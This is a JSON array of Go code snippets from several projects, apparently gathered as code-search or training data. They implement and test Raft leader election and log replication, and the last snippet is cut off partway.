[ "func TestLogReplication1(t *testing.T) {\n\n\tack := make(chan bool)\n\n\t//Get leader\n\tleaderId := raft.GetLeaderId()\n\n\t//Append a log entry to leader as client\n\traft.InsertFakeLogEntry(leaderId)\n\n\tleaderLog := raft.GetLogAsString(leaderId)\n\t// log.Println(leaderLog)\n\n\ttime.AfterFunc(1*time.Second, func() { ack <- true })\n\t<-ack //Wait for 1 second for log replication to happen\n\n\t//Get logs of all others and compare with each\n\tfor i := 0; i < 5; i++ {\n\t\tcheckIfExpected(t, raft.GetLogAsString(i), leaderLog)\n\t}\n\n}", "func TestLogReplication2(t *testing.T) {\n\tack := make(chan bool)\n\n\t//Kill one server\n\traft.KillServer(1)\n\n\t//Append log to server\n\ttime.AfterFunc(1*time.Second, func() {\n\t\t//Get leader\n\t\tleaderId := raft.GetLeaderId()\n\n\t\t//Append a log entry to leader as client\n\t\traft.InsertFakeLogEntry(leaderId)\n\t})\n\n\t//Resurrect old server after enough time for other to move on\n\ttime.AfterFunc(2*time.Second, func() {\n\t\t//Resurrect old server\n\t\traft.ResurrectServer(1)\n\t})\n\n\t//Check log after some time to see if it matches with current leader\n\ttime.AfterFunc(3*time.Second, func() {\n\t\tleaderId := raft.GetLeaderId()\n\t\tleaderLog := raft.GetLogAsString(leaderId)\n\t\tserverLog := raft.GetLogAsString(1)\n\n\t\tcheckIfExpected(t, serverLog, leaderLog)\n\n\t\tack <- true\n\t})\n\n\t<-ack\n\n}", "func TestStartFixesReplicationData(t *testing.T) {\n\tctx, cancel := context.WithCancel(context.Background())\n\tdefer cancel()\n\tcell := \"cell1\"\n\tts := memorytopo.NewServer(ctx, cell, \"cell2\")\n\ttm := newTestTM(t, ts, 1, \"ks\", \"0\")\n\tdefer tm.Stop()\n\ttabletAlias := tm.tabletAlias\n\n\tsri, err := ts.GetShardReplication(ctx, cell, \"ks\", \"0\")\n\trequire.NoError(t, err)\n\tutils.MustMatch(t, tabletAlias, sri.Nodes[0].TabletAlias)\n\n\t// Remove the ShardReplication record, try to create the\n\t// tablets again, make sure it's fixed.\n\terr = topo.RemoveShardReplicationRecord(ctx, ts, cell, \"ks\", \"0\", tabletAlias)\n\trequire.NoError(t, err)\n\tsri, err = ts.GetShardReplication(ctx, cell, \"ks\", \"0\")\n\trequire.NoError(t, err)\n\tassert.Equal(t, 0, len(sri.Nodes))\n\n\t// An initTablet will recreate the shard replication data.\n\terr = tm.initTablet(context.Background())\n\trequire.NoError(t, err)\n\n\tsri, err = ts.GetShardReplication(ctx, cell, \"ks\", \"0\")\n\trequire.NoError(t, err)\n\tutils.MustMatch(t, tabletAlias, sri.Nodes[0].TabletAlias)\n}", "func (s *ReplicaServer) StartAppend(op LogEntry) bool {\n\ts.mu.Lock()\n\tif !s.isPrimary {\n\t\ts.mu.Unlock()\n\t\treturn false\n\t}\n\ts.opLog = append(s.opLog, op)\n\ts.matchIdx[0] = uint64(len(s.opLog)) // FIXME: trigger commitIdx update\n\n\tclerks := s.replicaClerks\n\targs := &AppendArgs{\n\t\tcn: s.cn,\n\t\tlog: s.opLog,\n\t\tcommitIdx: s.commitIdx,\n\t}\n\ts.mu.Unlock()\n\n\t// XXX: use multipar?\n\tfor i, ck := range clerks {\n\t\tck := ck // XXX: because goose doesn't support passing in parameters\n\t\ti := i\n\t\tgo func() {\n\t\t\tck.AppendRPC(args)\n\t\t\ts.postAppendRPC(uint64(i)+1, args)\n\t\t}()\n\t}\n\treturn true\n}", "func TestLeaderCommitEntry(t *testing.T) {\n\ts := NewMemoryStorage()\n\tr := newTestRaft(1, []uint64{1, 2, 3}, 10, 1, s)\n\tdefer closeAndFreeRaft(r)\n\tr.becomeCandidate()\n\tr.becomeLeader()\n\tcommitNoopEntry(r, s)\n\tli := r.raftLog.lastIndex()\n\tr.Step(pb.Message{From: 1, To: 1, Type: pb.MsgProp, Entries: []pb.Entry{{Data: []byte(\"some data\")}}})\n\n\tfor _, m := range r.readMessages() {\n\t\tr.Step(acceptAndReply(m))\n\t}\n\n\tif g := r.raftLog.committed; g != li+1 {\n\t\tt.Errorf(\"committed = %d, want %d\", g, li+1)\n\t}\n\twents := []pb.Entry{{Index: li + 1, Term: 1, Data: []byte(\"some data\")}}\n\tif g := r.raftLog.nextEnts(); !reflect.DeepEqual(g, wents) {\n\t\tt.Errorf(\"nextEnts = %+v, want %+v\", g, wents)\n\t}\n\tmsgs := r.readMessages()\n\tsort.Sort(messageSlice(msgs))\n\tfor i, m := range msgs {\n\t\tif w := uint64(i + 2); m.To != w {\n\t\t\tt.Errorf(\"to = %x, want %x\", m.To, w)\n\t\t}\n\t\tif m.Type != pb.MsgApp {\n\t\t\tt.Errorf(\"type = %v, want %v\", m.Type, pb.MsgApp)\n\t\t}\n\t\tif m.Commit != li+1 {\n\t\t\tt.Errorf(\"commit = %d, want %d\", m.Commit, li+1)\n\t\t}\n\t}\n}", "func startLeaderListener(\n\tappendEntriesCom * [8]AppendEntriesCom,\n\tstate * ServerState,\n\ttimeSinceLastUpdate * time.Time,\n\tisElection * bool,\n\tserverStateLock * sync.Mutex,\n\t) {\n\tfor {\n\t\tselect {\n\t\tcase appendEntryRequest := <-appendEntriesCom[state.ServerId].message:\n\t\t\tif appendEntryRequest.Term >= state.CurrentTerm {\n\t\t\t\t*timeSinceLastUpdate = time.Now()\n\t\t\t\tif *isElection { //received message from leader during election,\n\t\t\t\t\t*isElection = false\n\t\t\t\t}\n\t\t\t\t\n\t\t\t\tprintMessageFromLeader(state.ServerId, appendEntryRequest)\n\t\t\t\tif state.Role != LeaderRole && len(appendEntryRequest.Entries) != 0 { //implements C3\n\t\t\t\t\tprocessAppendEntryRequest(appendEntryRequest, state, appendEntriesCom)\n\t\t\t\t\tfmt.Println(\"Server \", state.ServerId, \"'s current log: \", state.Log)\n\t\t\t\t}\n\t\t\t}\n\t\t}\n\t}\n}", "func TestLearnerLogReplication(t *testing.T) {\n\tn1 := newTestLearnerRaft(1, []uint64{1}, []uint64{2}, 10, 1, NewMemoryStorage())\n\tn2 := newTestLearnerRaft(2, []uint64{1}, []uint64{2}, 10, 1, NewMemoryStorage())\n\tdefer closeAndFreeRaft(n1)\n\tdefer closeAndFreeRaft(n2)\n\n\tnt := newNetwork(n1, n2)\n\n\tn1.becomeFollower(1, None)\n\tn2.becomeFollower(1, None)\n\n\tsetRandomizedElectionTimeout(n1, n1.electionTimeout)\n\tfor i := 0; i < n1.electionTimeout; i++ {\n\t\tn1.tick()\n\t}\n\n\tnt.send(pb.Message{From: 1, To: 1, Type: pb.MsgBeat})\n\n\t// n1 is leader and n2 is learner\n\tif n1.state != StateLeader {\n\t\tt.Errorf(\"peer 1 state: %s, want %s\", n1.state, StateLeader)\n\t}\n\tif !n2.isLearner {\n\t\tt.Error(\"peer 2 state: not learner, want yes\")\n\t}\n\n\tnextCommitted := n1.raftLog.committed + 1\n\tnt.send(pb.Message{From: 1, To: 1, Type: pb.MsgProp, Entries: []pb.Entry{{Data: []byte(\"somedata\")}}})\n\tif n1.raftLog.committed != nextCommitted {\n\t\tt.Errorf(\"peer 1 wants committed to %d, but still %d\", nextCommitted, n1.raftLog.committed)\n\t}\n\n\tif n1.raftLog.committed != n2.raftLog.committed {\n\t\tt.Errorf(\"peer 2 wants committed to %d, but still %d\", n1.raftLog.committed, n2.raftLog.committed)\n\t}\n\n\tmatch := n1.getProgress(2).Match\n\tif match != n2.raftLog.committed {\n\t\tt.Errorf(\"progress 2 of leader 1 wants match %d, but got %d\", n2.raftLog.committed, match)\n\t}\n}", "func TestPartition(t *testing.T) {\n\traftConf := &RaftConfig{MemberRegSocket: \"127.0.0.1:8124\", PeerSocket: \"127.0.0.1:9987\", TimeoutInMillis: 1500, HbTimeoutInMillis: 150, LogDirectoryPath: \"logs1\", StableStoreDirectoryPath: \"./stable1\", RaftLogDirectoryPath: \"../LocalLog1\"}\n\n\t// delete stored state to avoid unnecessary effect on following test cases\n\tinitState(raftConf.StableStoreDirectoryPath, raftConf.LogDirectoryPath, raftConf.RaftLogDirectoryPath)\n\n\t// launch cluster proxy servers\n\tcluster.NewProxyWithConfig(RaftToClusterConf(raftConf))\n\n\tfmt.Println(\"Started Proxy\")\n\n\ttime.Sleep(100 * time.Millisecond)\n\n\tserverCount := 5\n\traftServers := make([]raft.Raft, serverCount+1)\n\tpseudoClusters := make([]*test.PseudoCluster, serverCount+1)\n\n\tfor i := 1; i <= serverCount; i += 1 {\n\t\t// create cluster.Server\n\t\tclusterServer, err := cluster.NewWithConfig(i, \"127.0.0.1\", 8500+i, RaftToClusterConf(raftConf))\n\t\tpseudoCluster := test.NewPseudoCluster(clusterServer)\n\t\tif err != nil {\n\t\t\tt.Errorf(\"Error in creating cluster server. \" + err.Error())\n\t\t\treturn\n\t\t}\n\n\t\tlogStore, err := llog.Create(raftConf.RaftLogDirectoryPath + \"/\" + strconv.Itoa(i))\n\t\tif err != nil {\n\t\t\tt.Errorf(\"Error in creating log. \" + err.Error())\n\t\t\treturn\n\t\t}\n\n\t\ts, err := NewWithConfig(pseudoCluster, logStore, raftConf)\n\t\tif err != nil {\n\t\t\tt.Errorf(\"Error in creating Raft servers. \" + err.Error())\n\t\t\treturn\n\t\t}\n\t\traftServers[i] = s\n\t\tpseudoClusters[i] = pseudoCluster\n\t}\n\n\t// wait for leader to be elected\n\ttime.Sleep(20 * time.Second)\n\tcount := 0\n\toldLeader := 0\n\tfor i := 1; i <= serverCount; i += 1 {\n\t\tif raftServers[i].Leader() == raftServers[i].Pid() {\n\t\t\toldLeader = i\n\t\t\tcount++\n\t\t}\n\t}\n\tif count != 1 {\n\t\tt.Errorf(\"No leader was chosen in 1 minute\")\n\t\treturn\n\t}\n\n\t// isolate Leader and any one follower\n\tfollower := 0\n\tfor i := 1; i <= serverCount; i += 1 {\n\t\tif i != oldLeader {\n\t\t\tfollower = i\n\t\t\tbreak\n\t\t}\n\t}\n\tfmt.Println(\"Server \" + strconv.Itoa(follower) + \" was chosen as follower in minority partition\")\n\tfor i := 1; i <= serverCount; i += 1 {\n\t\tpseudoClusters[oldLeader].AddToInboxFilter(raftServers[i].Pid())\n\t\tpseudoClusters[oldLeader].AddToOutboxFilter(raftServers[i].Pid())\n\t\tpseudoClusters[follower].AddToInboxFilter(raftServers[i].Pid())\n\t\tpseudoClusters[follower].AddToOutboxFilter(raftServers[i].Pid())\n\t}\n\n\tpseudoClusters[oldLeader].AddToOutboxFilter(cluster.BROADCAST)\n\tpseudoClusters[follower].AddToOutboxFilter(cluster.BROADCAST)\n\n\t// wait for other servers to discover that leader\n\t// has crashed and to elect a new leader\n\ttime.Sleep(20 * time.Second)\n\n\tcount = 0\n\tfor i := 1; i <= serverCount; i += 1 {\n\n\t\tif i != oldLeader && i != follower && raftServers[i].Leader() == raftServers[i].Pid() {\n\t\t\tfmt.Println(\"Server \" + strconv.Itoa(i) + \" was chosen as new leader in majority partition.\")\n\t\t\tcount++\n\t\t}\n\t}\n\t// new leader must be chosen\n\tif count != 1 {\n\t\tt.Errorf(\"No leader was chosen in majority partition\")\n\t}\n}", "func TestNormalReplication(t *testing.T) {\n\tctl := gomock.NewController(t)\n\tdefer ctl.Finish()\n\n\tnextSeq := int64(5)\n\tmockServiceClient := storagemock.NewMockWriteServiceClient(ctl)\n\tmockServiceClient.EXPECT().Next(gomock.Any(), gomock.Any()).Return(&storage.NextSeqResponse{\n\t\tSeq: nextSeq,\n\t}, nil)\n\n\tdone := make(chan struct{})\n\tmockClientStream := storagemock.NewMockWriteService_WriteClient(ctl)\n\tmockClientStream.EXPECT().Recv().DoAndReturn(func() (*storage.WriteResponse, error) {\n\t\t<-done\n\t\treturn nil, errors.New(\"stream canceled\")\n\t})\n\n\t// replica 5~15\n\twr1, _ := buildWriteRequest(5, 15)\n\tmockClientStream.EXPECT().Send(wr1).Return(nil)\n\n\t// replica 15 ~ 20\n\twr2, _ := buildWriteRequest(15, 20)\n\tmockClientStream.EXPECT().Send(wr2).Return(nil)\n\n\tmockFct := rpc.NewMockClientStreamFactory(ctl)\n\tmockFct.EXPECT().CreateWriteServiceClient(node).Return(mockServiceClient, nil)\n\tmockFct.EXPECT().LogicNode().Return(node)\n\tmockFct.EXPECT().CreateWriteClient(database, shardID, node).Return(mockClientStream, nil)\n\n\tmockFanOut := queue.NewMockFanOut(ctl)\n\tmockFanOut.EXPECT().SetHeadSeq(nextSeq).Return(nil)\n\n\tfor i := 5; i < 20; i++ {\n\t\tmockFanOut.EXPECT().Consume().Return(int64(i))\n\t\tmockFanOut.EXPECT().Get(int64(i)).Return(buildMessageBytes(i), nil)\n\t}\n\tmockFanOut.EXPECT().Consume().Return(queue.SeqNoNewMessageAvailable).AnyTimes()\n\n\trep := newReplicator(node, database, shardID, mockFanOut, mockFct)\n\n\ttime.Sleep(time.Second * 2)\n\trep.Stop()\n\tclose(done)\n}", "func TestRaftNewLeader(t *testing.T) {\n\tID1 := \"1\"\n\tID2 := \"2\"\n\tclusterPrefix := \"TestRaftNewLeader\"\n\n\t// Create n1 node.\n\tstorage := NewStorage(NewMemSnapshotMgr(), NewMemLog(), NewMemState(0))\n\tfsm1 := newTestFSM(ID1)\n\t// NOTE we use different cluster ID for nodes within same cluster to avoid\n\t// registering same metric path twice. This should never happen in real world\n\t// because we'll never run nodes of a same cluster within one process.\n\tn1 := testCreateRaftNode(getTestConfig(ID1, clusterPrefix+ID1), storage)\n\t// Create n2 node.\n\tstorage = NewStorage(NewMemSnapshotMgr(), NewMemLog(), NewMemState(0))\n\tfsm2 := newTestFSM(ID2)\n\tn2 := testCreateRaftNode(getTestConfig(ID2, clusterPrefix+ID2), storage)\n\tconnectAllNodes(n1, n2)\n\tn1.Start(fsm1)\n\tn2.Start(fsm2)\n\tn2.ProposeInitialMembership([]string{ID1, ID2})\n\n\t// Wait until a leader is elected.\n\tselect {\n\tcase <-fsm1.leaderCh:\n\tcase <-fsm2.leaderCh:\n\t}\n}", "func (r *Raft) startReplication(state *leaderState, peer net.Addr) {\n\ts := &followerReplication{\n\t\tpeer: peer,\n\t\tinflight: state.inflight,\n\t\tstopCh: make(chan struct{}),\n\t\ttriggerCh: make(chan struct{}, 1),\n\t\tmatchIndex: r.getLastLogIndex(),\n\t\tnextIndex: r.getLastLogIndex() + 1,\n\t}\n\tstate.replicationState[peer.String()] = s\n\tgo r.replicate(s)\n}", "func TestLeaderSyncFollowerLog(t *testing.T) {\n\tents := []pb.Entry{\n\t\t{},\n\t\t{Term: 1, Index: 1}, {Term: 1, Index: 2}, {Term: 1, Index: 3},\n\t\t{Term: 4, Index: 4}, {Term: 4, Index: 5},\n\t\t{Term: 5, Index: 6}, {Term: 5, Index: 7},\n\t\t{Term: 6, Index: 8}, {Term: 6, Index: 9}, {Term: 6, Index: 10},\n\t}\n\tterm := uint64(8)\n\ttests := [][]pb.Entry{\n\t\t{\n\t\t\t{},\n\t\t\t{Term: 1, Index: 1}, {Term: 1, Index: 2}, {Term: 1, Index: 3},\n\t\t\t{Term: 4, Index: 4}, {Term: 4, Index: 5},\n\t\t\t{Term: 5, Index: 6}, {Term: 5, Index: 7},\n\t\t\t{Term: 6, Index: 8}, {Term: 6, Index: 9},\n\t\t},\n\t\t{\n\t\t\t{},\n\t\t\t{Term: 1, Index: 1}, {Term: 1, Index: 2}, {Term: 1, Index: 3},\n\t\t\t{Term: 4, Index: 4},\n\t\t},\n\t\t{\n\t\t\t{},\n\t\t\t{Term: 1, Index: 1}, {Term: 1, Index: 2}, {Term: 1, Index: 3},\n\t\t\t{Term: 4, Index: 4}, {Term: 4, Index: 5},\n\t\t\t{Term: 5, Index: 6}, {Term: 5, Index: 7},\n\t\t\t{Term: 6, Index: 8}, {Term: 6, Index: 9}, {Term: 6, Index: 10}, {Term: 6, Index: 11},\n\t\t},\n\t\t{\n\t\t\t{},\n\t\t\t{Term: 1, Index: 1}, {Term: 1, Index: 2}, {Term: 1, Index: 3},\n\t\t\t{Term: 4, Index: 4}, {Term: 4, Index: 5},\n\t\t\t{Term: 5, Index: 6}, {Term: 5, Index: 7},\n\t\t\t{Term: 6, Index: 8}, {Term: 6, Index: 9}, {Term: 6, Index: 10},\n\t\t\t{Term: 7, Index: 11}, {Term: 7, Index: 12},\n\t\t},\n\t\t{\n\t\t\t{},\n\t\t\t{Term: 1, Index: 1}, {Term: 1, Index: 2}, {Term: 1, Index: 3},\n\t\t\t{Term: 4, Index: 4}, {Term: 4, Index: 5}, {Term: 4, Index: 6}, {Term: 4, Index: 7},\n\t\t},\n\t\t{\n\t\t\t{},\n\t\t\t{Term: 1, Index: 1}, {Term: 1, Index: 2}, {Term: 1, Index: 3},\n\t\t\t{Term: 2, Index: 4}, {Term: 2, Index: 5}, {Term: 2, Index: 6},\n\t\t\t{Term: 3, Index: 7}, {Term: 3, Index: 8}, {Term: 3, Index: 9}, {Term: 3, Index: 10}, {Term: 3, Index: 11},\n\t\t},\n\t}\n\tfor i, tt := range tests {\n\t\tleadStorage := NewMemoryStorage()\n\t\tdefer leadStorage.Close()\n\t\tleadStorage.Append(ents)\n\t\tlead := newTestRaft(1, []uint64{1, 2, 3}, 10, 1, leadStorage)\n\t\tlead.loadState(pb.HardState{Commit: lead.raftLog.lastIndex(), Term: term})\n\t\tfollowerStorage := NewMemoryStorage()\n\t\tdefer followerStorage.Close()\n\t\tfollowerStorage.Append(tt)\n\t\tfollower := newTestRaft(2, []uint64{1, 2, 3}, 10, 1, followerStorage)\n\t\tfollower.loadState(pb.HardState{Term: term - 1})\n\t\t// It is necessary to have a three-node cluster.\n\t\t// The second may have more up-to-date log than the first one, so the\n\t\t// first node needs the vote from the third node to become the leader.\n\t\tn := newNetwork(lead, follower, nopStepper)\n\t\tn.send(pb.Message{From: 1, To: 1, Type: pb.MsgHup})\n\t\t// The election occurs in the term after the one we loaded with\n\t\t// lead.loadState above.\n\t\tn.send(pb.Message{From: 3, To: 1, Type: pb.MsgVoteResp, Term: term + 1})\n\n\t\tn.send(pb.Message{From: 1, To: 1, Type: pb.MsgProp, Entries: []pb.Entry{{}}})\n\n\t\tif g := diffu(ltoa(lead.raftLog), ltoa(follower.raftLog)); g != \"\" {\n\t\t\tt.Errorf(\"#%d: log diff:\\n%s\", i, g)\n\t\t}\n\t}\n}", "func (rf *Raft) Start(command interface{}) (int, int, bool) {\n\tindex := -1\n\tterm := -1\n\tisLeader := true\n\n\t// Your code here (2B).\n\tif rf.state == Leader {\n\t\tnewLogEntry := LogEntry{}\n\t\trf.mu.Lock()\n\t\tif rf.state == Leader {\n\t\t\tterm = rf.currentTerm\n\t\t\tnewLogEntry.Term = term\n\t\t\tnewLogEntry.Command = command\n\t\t\trf.log = append(rf.log, newLogEntry)\n\t\t\tindex = len(rf.log) - 1\n\t\t\t// update leader's matchIndex and nextIndex\n\t\t\trf.matchIndex[rf.me] = index\n\t\t\trf.nextIndex[rf.me] = index + 1\n\t\t\trf.persist()\n\t\t} else {\n\t\t\tDPrintf(\"Peer-%d, before lock, the state has changed to %d.\\n\", rf.me, rf.state)\n\t\t}\n\t\tif term != -1 {\n\t\t\tDPrintf(\"Peer-%d start to append %v to peers.\\n\", rf.me, command)\n\t\t\trequest := rf.createAppendEntriesRequest(index, index+1, term)\n\t\t\tappendProcess := func(server int) bool {\n\t\t\t\treply := new(AppendEntriesReply)\n\t\t\t\trf.sendAppendEntries(server, request, reply)\n\t\t\t\tok := rf.processAppendEntriesReply(index+1, reply)\n\t\t\t\tif ok {\n\t\t\t\t\tDPrintf(\"Peer-%d append log=%v to peer-%d successfully.\\n\", rf.me, request.Entries, server)\n\t\t\t\t} else {\n\t\t\t\t\tDPrintf(\"Peer-%d append log=%v to peer-%d failed.\\n\", rf.me, request.Entries, server)\n\t\t\t\t}\n\t\t\t\treturn ok\n\t\t\t}\n\t\t\tgo func() {\n\t\t\t\tok := rf.agreeWithServers(appendProcess)\n\t\t\t\tif ok {\n\t\t\t\t\t// if append successfully, update commit index.\n\t\t\t\t\trf.mu.Lock()\n\t\t\t\t\tif index >= rf.commitIndex {\n\t\t\t\t\t\tDPrintf(\"Peer-%d set commit=%d, origin=%d.\", rf.me, index, rf.commitIndex)\n\t\t\t\t\t\trf.commitIndex = index\n\t\t\t\t\t} else {\n\t\t\t\t\t\tDPrintf(\"Peer-%d get a currentIndex=%d < commitIndex=%d, it can not be happend.\", rf.me, index, rf.commitIndex)\n\t\t\t\t\t}\n\t\t\t\t\trf.mu.Unlock()\n\t\t\t\t} else {\n\t\t\t\t\tDPrintf(\"Peer-%d start agreement with servers failed. currentIndex=%d.\\n\", rf.me, index)\n\t\t\t\t}\n\t\t\t}()\n\t\t}\n\t\trf.mu.Unlock()\n\t} else {\n\t\tisLeader = false\n\t}\n\treturn index, term, isLeader\n}", "func (rf *Raft) Start(command interface{}) (int, int, bool) {\n lastLogIndex := 0\n isLeader := true\n \n // TODO WED: check corner cases with -1\n rf.mu.Lock()\n term := rf.currentTerm\n myId := rf.me\n if len(rf.log) > 0 {\n lastLogIndex = len(rf.log)\n //term = rf.log[index].Term \n }\n \n if rf.state != Leader || rf.killed() {\n return lastLogIndex-1, term, false\n }\n \n var oneEntry LogEntry\n oneEntry.Command = command\n oneEntry.Term = term\n \n rf.log = append(rf.log, oneEntry)\n rf.mu.Unlock()\n\n \n go func() {\n \n // Add a while loop. when successReply count greater than threhsold, commit. loop breaks when successReply is equal to peers\n // the for loop inside only iterates over the left peers.\n \n var localMu sync.Mutex\n \n isLeader := true\n committed := false\n successReplyCount := 0\n var receivedResponse []int\n receivedResponse = append(receivedResponse, myId)\n\n for isLeader {\n if rf.killed() {\n fmt.Printf(\"*** Peer %d term %d: Terminated. Closing all outstanding Append Entries calls to followers.\",myId, term)\n return \n }\n\n var args = AppendEntriesArgs {\n LeaderId: myId,\n }\n rf.mu.Lock()\n numPeers := len(rf.peers)\n rf.mu.Unlock()\n\n for id := 0; id < numPeers && isLeader; id++ {\n if (!find(receivedResponse,id)) {\n if lastLogIndex < rf.nextIndex[id] {\n successReplyCount++\n receivedResponse = append(receivedResponse,id)\n continue\n }\n var logEntries []LogEntry\n logEntries = append(logEntries,rf.log[(rf.nextIndex[id]):]...)\n args.LogEntries = logEntries\n args.PrevLogTerm = rf.log[rf.nextIndex[id]-1].Term\n args.PrevLogIndex = rf.nextIndex[id]-1\n args.LeaderTerm = rf.currentTerm\n args.LeaderCommitIndex = rf.commitIndex\n \n go func(serverId int) {\n var reply AppendEntriesReply\n ok:=rf.sendAppendEntries(serverId, &args, &reply)\n if !rf.CheckTerm(reply.CurrentTerm) {\n localMu.Lock()\n isLeader=false\n localMu.Unlock()\n } else if reply.Success && ok {\n localMu.Lock()\n successReplyCount++\n receivedResponse = append(receivedResponse,serverId)\n localMu.Unlock()\n rf.mu.Lock()\n if lastLogIndex >= rf.nextIndex[id] {\n rf.matchIndex[id]= lastLogIndex\n rf.nextIndex[id] = lastLogIndex + 1\n }\n rf.mu.Unlock()\n } else {\n rf.mu.Lock()\n rf.nextIndex[id]-- \n rf.mu.Unlock()\n }\n } (id)\n }\n }\n \n fmt.Printf(\"\\nsleeping before counting success replies\\n\")\n time.Sleep(time.Duration(RANDOM_TIMER_MIN*time.Millisecond))\n\n if !committed && isLeader {\n votesForIndex := 0\n N := math.MaxInt32\n rf.mu.Lock()\n for i := 0; i < numPeers; i++ {\n if rf.matchIndex[i] > rf.commitIndex {\n if rf.matchIndex[i] < N {\n N = rf.matchIndex[i]\n }\n votesForIndex++\n }\n }\n rf.mu.Unlock()\n\n\n if (votesForIndex > (numPeers/2)){ \n go func(){\n committed = true\n rf.mu.Lock()\n rf.commitIndex = N // Discuss: 3. should we use lock?\n rf.log[N].Term = rf.currentTerm\n if rf.commitIndex >= lastLogIndex {\n var oneApplyMsg ApplyMsg\n oneApplyMsg.CommandValid = true\n oneApplyMsg.CommandIndex = lastLogIndex\n oneApplyMsg.Command = command\n go func() {rf.applyCh <- oneApplyMsg} ()\n }\n rf.mu.Unlock()\n }()\n }\n } else if successReplyCount == numPeers {\n return\n } \n }\n } ()\n \n // Your code here (2B code).\n return lastLogIndex, term, isLeader\n}", "func startServer(\n\tstate *ServerState,\n\tvoteChannels *[ClusterSize]chan Vote,\n\tappendEntriesCom *[ClusterSize]AppendEntriesCom,\n\tclientCommunicationChannel chan KeyValue,\n\tpersister Persister,\n\tchannel ApplyChannel,\n\t) Raft {\n\n\tisElection := true\n\telectionThreadSleepTime := time.Millisecond * 1000\n\ttimeSinceLastUpdate := time.Now() //update includes election or message from leader\n\tserverStateLock := new(sync.Mutex)\n\tonWinChannel := make(chan bool)\n\n\tgo runElectionTimeoutThread(&timeSinceLastUpdate, &isElection, state, voteChannels, &onWinChannel, electionThreadSleepTime)\n\tgo startLeaderListener(appendEntriesCom, state, &timeSinceLastUpdate, &isElection, serverStateLock) //implements F1.\n\tgo onWinChannelListener(state, &onWinChannel, serverStateLock, appendEntriesCom, &clientCommunicationChannel, persister, channel) //in leader.go\n\n\t//creates raft object with closure\n\traft := Raft{}\n\traft.Start = func (logEntry LogEntry) (int, int, bool){ //implements\n\t\tgo func () { //non blocking sent through client (leader may not be choosen yet).\n\t\t\tclientCommunicationChannel <- logEntry.Content\n\t\t}()\n\t\treturn len(state.Log), state.CurrentTerm, state.Role == LeaderRole\n\t}\n\n\traft.GetState = func ()(int, bool) {\n\t\treturn state.CurrentTerm, state.Role == LeaderRole\n\t}\n\treturn raft\n}", "func TestMultiNodeStart(t *testing.T) {\n\tctx, cancel := context.WithCancel(context.Background())\n\tdefer cancel()\n\n\tcc := raftpb.ConfChange{Type: raftpb.ConfChangeAddNode, NodeID: 1}\n\tccdata, err := cc.Marshal()\n\tif err != nil {\n\t\tt.Fatalf(\"unexpected marshal error: %v\", err)\n\t}\n\twants := []Ready{\n\t\t{\n\t\t\tSoftState: &SoftState{Lead: 1, RaftState: StateLeader},\n\t\t\tHardState: raftpb.HardState{Term: 2, Commit: 2, Vote: 1},\n\t\t\tEntries: []raftpb.Entry{\n\t\t\t\t{Type: raftpb.EntryConfChange, Term: 1, Index: 1, Data: ccdata},\n\t\t\t\t{Term: 2, Index: 2},\n\t\t\t},\n\t\t\tCommittedEntries: []raftpb.Entry{\n\t\t\t\t{Type: raftpb.EntryConfChange, Term: 1, Index: 1, Data: ccdata},\n\t\t\t\t{Term: 2, Index: 2},\n\t\t\t},\n\t\t},\n\t\t{\n\t\t\tHardState: raftpb.HardState{Term: 2, Commit: 3, Vote: 1},\n\t\t\tEntries: []raftpb.Entry{{Term: 2, Index: 3, Data: []byte(\"foo\")}},\n\t\t\tCommittedEntries: []raftpb.Entry{{Term: 2, Index: 3, Data: []byte(\"foo\")}},\n\t\t},\n\t}\n\tmn := StartMultiNode(1)\n\tstorage := NewMemoryStorage()\n\tmn.CreateGroup(1, newTestConfig(1, nil, 10, 1, storage), []Peer{{ID: 1}})\n\tmn.Campaign(ctx, 1)\n\tgs := <-mn.Ready()\n\tg := gs[1]\n\tif !reflect.DeepEqual(g, wants[0]) {\n\t\tt.Fatalf(\"#%d: g = %+v,\\n w %+v\", 1, g, wants[0])\n\t} else {\n\t\tstorage.Append(g.Entries)\n\t\tmn.Advance(gs)\n\t}\n\n\tmn.Propose(ctx, 1, []byte(\"foo\"))\n\tif gs2 := <-mn.Ready(); !reflect.DeepEqual(gs2[1], wants[1]) {\n\t\tt.Errorf(\"#%d: g = %+v,\\n w %+v\", 2, gs2[1], wants[1])\n\t} else {\n\t\tstorage.Append(gs2[1].Entries)\n\t\tmn.Advance(gs2)\n\t}\n\n\tselect {\n\tcase rd := <-mn.Ready():\n\t\tt.Errorf(\"unexpected Ready: %+v\", rd)\n\tcase <-time.After(time.Millisecond):\n\t}\n}", "func TestSetLocalHeadSeqSuccess(t *testing.T) {\n\tctl := gomock.NewController(t)\n\tdefer ctl.Finish()\n\n\tnextSeq := int64(5)\n\tmockServiceClient := storagemock.NewMockWriteServiceClient(ctl)\n\tmockServiceClient.EXPECT().Next(gomock.Any(), gomock.Any()).Return(&storage.NextSeqResponse{\n\t\tSeq: nextSeq,\n\t}, nil)\n\n\tmockFct := rpc.NewMockClientStreamFactory(ctl)\n\tmockFct.EXPECT().CreateWriteServiceClient(node).Return(mockServiceClient, nil)\n\tmockFct.EXPECT().LogicNode().Return(node)\n\tmockFct.EXPECT().CreateWriteClient(gomock.Any(), gomock.Any(), gomock.Any()).Return(nil, errors.New(\"create stream client error\"))\n\n\tdone := make(chan struct{})\n\tmockFct.EXPECT().CreateWriteServiceClient(node).DoAndReturn(func(_ models.Node) (storage.WriteServiceClient, error) {\n\t\tclose(done)\n\t\t// wait for <- done to stop replica\n\t\ttime.Sleep(100 * time.Millisecond)\n\t\treturn nil, errors.New(\"get service client error any\")\n\t})\n\n\tmockFanOut := queue.NewMockFanOut(ctl)\n\tmockFanOut.EXPECT().SetHeadSeq(nextSeq).Return(nil)\n\n\trep := newReplicator(node, database, shardID, mockFanOut, mockFct)\n\n\t<-done\n\trep.Stop()\n}", "func TestSplitCloneV2_NoMasterAvailable(t *testing.T) {\n\tdelay := discovery.GetTabletPickerRetryDelay()\n\tdefer func() {\n\t\tdiscovery.SetTabletPickerRetryDelay(delay)\n\t}()\n\tdiscovery.SetTabletPickerRetryDelay(5 * time.Millisecond)\n\n\ttc := &splitCloneTestCase{t: t}\n\ttc.setUp(false /* v3 */)\n\tdefer tc.tearDown()\n\n\t// Only wait 1 ms between retries, so that the test passes faster.\n\t*executeFetchRetryTime = 1 * time.Millisecond\n\n\t// leftReplica will take over for the last, 30th, insert and the vreplication checkpoint.\n\ttc.leftReplicaFakeDb.AddExpectedQuery(\"INSERT INTO `vt_ks`.`table1` (`id`, `msg`, `keyspace_id`) VALUES (*\", nil)\n\n\t// During the 29th write, let the 